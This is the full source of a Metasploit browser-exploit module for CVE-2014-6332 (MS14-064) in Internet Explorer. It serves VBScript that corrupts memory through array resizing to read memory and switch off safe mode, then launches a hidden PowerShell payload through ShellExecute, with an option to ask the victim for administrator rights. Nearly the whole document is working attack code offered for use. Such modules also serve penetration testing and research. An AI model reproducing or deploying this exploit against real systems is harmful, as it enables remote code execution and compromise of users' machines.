Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
require 'msf/core'  
require 'msf/core/exploit/powershell'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::BrowserExploitServer  
include Msf::Exploit::Remote::BrowserAutopwn  
include Msf::Exploit::Powershell  
  
autopwn_info({  
:ua_name => HttpClients::IE,  
:ua_minver => "3.0",  
:ua_maxver => "10.0",  
:javascript => true,  
:os_name => OperatingSystems::Match::WINDOWS,  
:rank => ExcellentRanking  
})  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",  
'Description' => %q{  
This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332.  
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.  
Powershell is required on the target machine. On Internet Explorer versions using Protected Mode,  
the user has to manually allow powershell.exe to execute in order to be compromised.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Robert Freeman', # IBM X-Force  
'yuange', # twitter.com/yuange75  
'Rik van Duijn', # twitter.com/rikvduijn  
'Wesley Neelen', # security[at]forsec.nl  
'GradiusX <francescomifsud[at]gmail.com>',  
'b33f', # @FuzzySec  
],  
'References' =>  
[  
[ 'CVE', '2014-6332' ],  
[ 'MSB', 'MS14-064' ],  
[ 'OSVDB', '114533' ],  
[ 'EDB', '35229' ],  
[ 'EDB', '35308' ],  
[ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ],  
[ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ]  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],  
],  
'BrowserRequirements' =>  
{  
:source => /script|headers/i,  
:ua_name => HttpClients::IE,  
:os_name => /win/i,  
:arch => 'x86',  
:ua_ver => lambda { |ver| ver.to_i.between?(4, 10) }  
},  
'DefaultOptions' =>  
{  
'HTTP::compression' => 'gzip'  
},  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'Privileged' => false,  
'DisclosureDate' => "Nov 13 2014",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),  
], self.class )  
  
end  
  
def vbs_prepare()  
code = %Q|  
dim aa()  
dim ab()  
dim a0  
dim a1  
dim a2  
dim a3  
dim win9x  
dim intVersion  
dim rnda  
dim funclass  
dim myarray  
  
Begin()  
  
neline  
function Begin()  
On Error Resume Next  
info=Navigator.UserAgent  
  
if(instr(info,"Win64")>0) then  
exit function  
end if  
  
if (instr(info,"MSIE")>0) then  
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))  
else  
exit function  
  
end if  
  
win9x=0  
  
BeginInit()  
If Create()=True Then  
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
if(intVersion<4) then  
document.write("<br> IE")  
document.write(intVersion)  
runshellcode()  
else  
setnotsafemode()  
end if  
end if  
end function  
  
function BeginInit()  
Randomize()  
redim aa(5)  
redim ab(5)  
a0=13+17*rnd(6)  
a3=7+3*rnd(5)  
end function  
  
function Create()  
On Error Resume Next  
dim i  
Create=False  
For i = 0 To 400  
If Over()=True Then  
' document.write(i)  
Create=True  
Exit For  
End If  
Next  
end function  
  
sub testaa()  
end sub  
  
function mydata()  
On Error Resume Next  
i=testaa  
i=null  
redim Preserve aa(a2)  
  
ab(0)=0  
aa(a1)=i  
ab(0)=6.36598737437801E-314  
  
aa(a1+2)=myarray  
ab(2)=1.74088534731324E-310  
mydata=aa(a1)  
redim Preserve aa(a0)  
end function  
  
function setnotsafemode()  
On Error Resume Next  
i=mydata()  
i=readmemo(i+8)  
i=readmemo(i+16)  
j=readmemo(i+&h134)  
for k=0 to &h60 step 4  
j=readmemo(i+&h120+k)  
if(j=14) then  
j=0  
redim Preserve aa(a2)  
aa(a1+2)(i+&h11c+k)=ab(4)  
redim Preserve aa(a0)  
  
j=0  
j=readmemo(i+&h120+k)  
  
Exit for  
end if  
  
next  
ab(2)=1.69759663316747E-313  
runaaaa()  
end function  
  
function Over()  
On Error Resume Next  
dim type1,type2,type3  
Over=False  
a0=a0+a3  
a1=a0+2  
a2=a0+&h8000000  
  
redim Preserve aa(a0)  
redim ab(a0)  
  
redim Preserve aa(a2)  
  
type1=1  
ab(0)=1.123456789012345678901234567890  
aa(a0)=10  
  
If(IsObject(aa(a1-1)) = False) Then  
if(intVersion<4) then  
mem=cint(a0+1)*16  
j=vartype(aa(a1-1))  
if((j=mem+4) or (j*8=mem+8)) then  
if(vartype(aa(a1-1))<>0) Then  
If(IsObject(aa(a1)) = False ) Then  
type1=VarType(aa(a1))  
end if  
end if  
else  
redim Preserve aa(a0)  
exit function  
  
end if  
else  
if(vartype(aa(a1-1))<>0) Then  
If(IsObject(aa(a1)) = False ) Then  
type1=VarType(aa(a1))  
end if  
end if  
end if  
end if  
  
  
If(type1=&h2f66) Then  
Over=True  
End If  
If(type1=&hB9AD) Then  
Over=True  
win9x=1  
End If  
  
redim Preserve aa(a0)  
  
end function  
  
function ReadMemo(add)  
On Error Resume Next  
redim Preserve aa(a2)  
  
ab(0)=0  
aa(a1)=add+4  
ab(0)=1.69759663316747E-313  
ReadMemo=lenb(aa(a1))  
  
ab(0)=0  
  
redim Preserve aa(a0)  
end function  
  
|  
  
end  
  
def get_html()  
  
if datastore['TRYUAC']  
tryuac = 'runas'  
else  
tryuac = 'open'  
end  
  
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })  
payl.slice! "powershell.exe "  
prep = vbs_prepare()  
  
html = %Q|  
<!doctype html>  
<html>  
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >  
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />  
<body>  
<script language="VBScript">  
function runaaaa()  
On Error Resume Next  
  
set shell=createobject("Shell.Application")  
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0  
  
end function  
</script>  
<script language="VBScript">  
#{prep}  
</script>  
</body>  
</html>  
|  
  
end  
  
def on_request_exploit(cli, request, target_info)  
print_status("Requesting: #{request.uri}")  
send_exploit_html(cli, get_html())  
end  
  
end  
  
`